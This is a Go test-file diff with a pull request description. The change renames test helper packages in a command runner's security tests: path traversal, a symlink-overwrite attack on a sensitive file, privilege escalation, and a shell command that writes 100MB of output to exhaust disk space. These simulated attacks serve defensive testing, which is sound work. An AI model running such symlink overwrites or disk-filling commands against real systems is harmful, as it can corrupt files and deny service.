@@ -81,11 +81,11 @@ func TestPathTraversalAttack(t *testing.T) {
 
 	for _, tc := range testCases {
 		t.Run(tc.name, func(t *testing.T) {
-			runtimeCmd := executortesting.CreateRuntimeCommand(
+			runtimeCmd := executortestutil.CreateRuntimeCommand(
 				echoCmd,
 				[]string{"test output"},
-				executortesting.WithName("path_traversal_test"),
-				executortesting.WithOutputFile(tc.outputPath),
+				executortestutil.WithName("path_traversal_test"),
+				executortestutil.WithOutputFile(tc.outputPath),
 			)
 
 			groupSpec := &runnertypes.GroupSpec{
@@ -98,7 +98,7 @@ func TestPathTraversalAttack(t *testing.T) {
 			privMgr := privilege.NewManager(slog.Default())
 			logger := slog.Default()
 
-			manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+			manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 			ctx := context.Background()
 			_, result, err := manager.ExecuteCommand(ctx, runtimeCmd, groupSpec, map[string]string{})
 
@@ -137,11 +137,11 @@ func TestSymlinkAttack(t *testing.T) {
 	err := os.Symlink(sensitiveFile, symlinkPath)
 	require.NoError(t, err)
 
-	runtimeCmd := executortesting.CreateRuntimeCommand(
+	runtimeCmd := executortestutil.CreateRuntimeCommand(
 		echoCmd,
 		[]string{"malicious content"},
-		executortesting.WithName("symlink_attack_test"),
-		executortesting.WithOutputFile(symlinkPath),
+		executortestutil.WithName("symlink_attack_test"),
+		executortestutil.WithOutputFile(symlinkPath),
 	)
 
 	groupSpec := &runnertypes.GroupSpec{
@@ -154,7 +154,7 @@ func TestSymlinkAttack(t *testing.T) {
 	privMgr := privilege.NewManager(slog.Default())
 	logger := slog.Default()
 
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 	ctx := context.Background()
 	_, _, err = manager.ExecuteCommand(ctx, runtimeCmd, groupSpec, map[string]string{})
 
@@ -212,11 +212,11 @@ func TestPrivilegeEscalationAttack(t *testing.T) {
 
 	for _, tc := range testCases {
 		t.Run(tc.name, func(t *testing.T) {
-			runtimeCmd := executortesting.CreateRuntimeCommand(
+			runtimeCmd := executortestutil.CreateRuntimeCommand(
 				echoCmd,
 				[]string{"test output"},
-				executortesting.WithName("privilege_escalation_test"),
-				executortesting.WithOutputFile(tc.outputPath),
+				executortestutil.WithName("privilege_escalation_test"),
+				executortestutil.WithOutputFile(tc.outputPath),
 			)
 			outputSizeLimit := int64(1024 * 1024)
 			runtimeCmd.EffectiveOutputSizeLimit = common.NewOutputSizeLimitFromPtr(&outputSizeLimit)
@@ -261,11 +261,11 @@ func TestDiskSpaceExhaustionAttack(t *testing.T) {
 
 	// Create command that attempts to generate very large output
 	largeSize := 100 * 1024 * 1024 // 100MB
-	runtimeCmd := executortesting.CreateRuntimeCommand(
+	runtimeCmd := executortestutil.CreateRuntimeCommand(
 		shCmd,
 		[]string{"-c", "yes 'A' | head -c " + strconv.Itoa(largeSize)},
-		executortesting.WithName("disk_exhaustion_test"),
-		executortesting.WithOutputFile(outputPath),
+		executortestutil.WithName("disk_exhaustion_test"),
+		executortestutil.WithOutputFile(outputPath),
 	)
 
 	groupSpec := &runnertypes.GroupSpec{
@@ -277,7 +277,7 @@ func TestDiskSpaceExhaustionAttack(t *testing.T) {
 	exec := executor.NewDefaultExecutor()
 	privMgr := privilege.NewManager(slog.Default())
 	logger := slog.Default()
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 	ctx := context.Background()
 	_, result, err := manager.ExecuteCommand(ctx, runtimeCmd, groupSpec, map[string]string{})
 
@@ -306,11 +306,11 @@ func TestFilePermissionValidation(t *testing.T) {
 	tempDir := tu.SafeTempDir(t)
 	outputPath := filepath.Join(tempDir, "permission_test.txt")
 
-	runtimeCmd := executortesting.CreateRuntimeCommand(
+	runtimeCmd := executortestutil.CreateRuntimeCommand(
 		echoCmd,
 		[]string{"test output"},
-		executortesting.WithName("permission_test"),
-		executortesting.WithOutputFile(outputPath),
+		executortestutil.WithName("permission_test"),
+		executortestutil.WithOutputFile(outputPath),
 	)
 
 	groupSpec := &runnertypes.GroupSpec{
@@ -323,7 +323,7 @@ func TestFilePermissionValidation(t *testing.T) {
 	privMgr := privilege.NewManager(slog.Default())
 	logger := slog.Default()
 
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 	ctx := context.Background()
 	_, result, err := manager.ExecuteCommand(ctx, runtimeCmd, groupSpec, map[string]string{})
 	// In current implementation, output capture is not fully integrated
@@ -362,17 +362,17 @@ func TestConcurrentSecurityValidation(t *testing.T) {
 	privMgr := privilege.NewManager(slog.Default())
 	logger := slog.Default()
 
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 
 	for i := range numGoroutines {
 		go func(index int) {
 			outputPath := filepath.Join(tempDir, fmt.Sprintf("concurrent_test_%d.txt", index))
 
-			runtimeCmd := executortesting.CreateRuntimeCommand(
+			runtimeCmd := executortestutil.CreateRuntimeCommand(
 				echoCmd,
 				[]string{"concurrent test output"},
-				executortesting.WithName("concurrent_security_test"),
-				executortesting.WithOutputFile(outputPath),
+				executortestutil.WithName("concurrent_security_test"),
+				executortestutil.WithOutputFile(outputPath),
 			)
 
 			groupSpec := &runnertypes.GroupSpec{
@@ -431,11 +431,11 @@ func TestSecurityValidatorIntegration(t *testing.T) {
 
 	for _, tc := range testCases {
 		t.Run(tc.name, func(t *testing.T) {
-			runtimeCmd := executortesting.CreateRuntimeCommand(
+			runtimeCmd := executortestutil.CreateRuntimeCommand(
 				echoCmd,
 				[]string{"test output"},
-				executortesting.WithName("security_integration_test"),
-				executortesting.WithOutputFile(tc.outputPath),
+				executortestutil.WithName("security_integration_test"),
+				executortestutil.WithOutputFile(tc.outputPath),
 			)
 
 			groupSpec := &runnertypes.GroupSpec{
@@ -448,7 +448,7 @@ func TestSecurityValidatorIntegration(t *testing.T) {
 			privMgr := privilege.NewManager(slog.Default())
 			logger := slog.Default()
 
-			manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+			manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 			ctx := context.Background()
 			_, result, err := manager.ExecuteCommand(ctx, runtimeCmd, groupSpec, map[string]string{})
 
@@ -483,7 +483,7 @@ func TestRaceConditionPrevention(t *testing.T) {
 	privMgr := privilege.NewManager(slog.Default())
 	logger := slog.Default()
 
-	manager := resourcetesting.NewNormalResourceManager(exec, fs, privMgr, logger)
+	manager := resourcetestutil.NewNormalResourceManager(exec, fs, privMgr, logger)
 
 	// Create multiple goroutines trying to write to the same output file
 	numGoroutines := 5
@@ -491,11 +491,11 @@ func TestRaceConditionPrevention(t *testing.T) {
 
 	for i := range numGoroutines {
 		go func(index int) {
-			runtimeCmd := executortesting.CreateRuntimeCommand(
+			runtimeCmd := executortestutil.CreateRuntimeCommand(
 				echoCmd,
 				[]string{fmt.Sprintf("content from goroutine %d", index)},
-				executortesting.WithName("race_condition_test"),
-				executortesting.WithOutputFile(outputPath),
+				executortestutil.WithName("race_condition_test"),
+				executortestutil.WithOutputFile(outputPath),
 			)
 
 			groupSpec := &runnertypes.GroupSpec{


### PR DESCRIPTION
Standardize all test helper packages on the testutil/ directory layout with domain-prefixed package names (e.g. commontestutil, securitytestutil). The root internal/testutil keeps the short pkg name tu since its helpers are used heavily for inline test data construction.

This removes the need for import aliases at every call site, which had already drifted (resourcetestutil vs resourcetesting referred to the same package).